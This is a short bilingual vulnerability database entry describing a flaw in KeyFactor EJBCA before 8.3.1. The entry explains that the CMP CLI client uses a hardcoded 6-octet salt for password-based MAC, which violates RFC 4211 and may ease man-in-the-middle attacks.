Vulnerability Information
Although we use advanced large model technology, its output may still contain inaccurate or outdated information.Shenlong tries to ensure data accuracy, but please verify and judge based on the actual situation.
Vulnerability Title
N/A
Vulnerability Description
The CMP CLI client in KeyFactor EJBCA before 8.3.1 has only 6 octets of salt, and is thus not compliant with the security requirements of RFC 4211, and might make man-in-the-middle attacks easier. CMP includes password-based MAC as one of the options for message integrity and authentication (the other option is certificate-based). RFC 4211 section 4.4 requires that password-based MAC parameters use a salt with a random value of at least 8 octets. This helps to inhibit dictionary attacks. Because the standalone CMP client originally was developed as test code, the salt was instead hardcoded and only 6 octets long.
CVSS Information
N/A
Vulnerability Type
N/A
Vulnerability Title
EJBCA 安全漏洞
Vulnerability Description
EJBCA是Keyfactor开源的一个开源公钥基础设施(PKI)和证书颁发机构(CA)软件。 EJBCA 8.3.1之前版本存在安全漏洞,该漏洞源于CMP CLI客户端的盐值长度不符合RFC 4211的安全要求,会使中间人攻击更容易发生。
CVSS Information
N/A
Vulnerability Type
N/A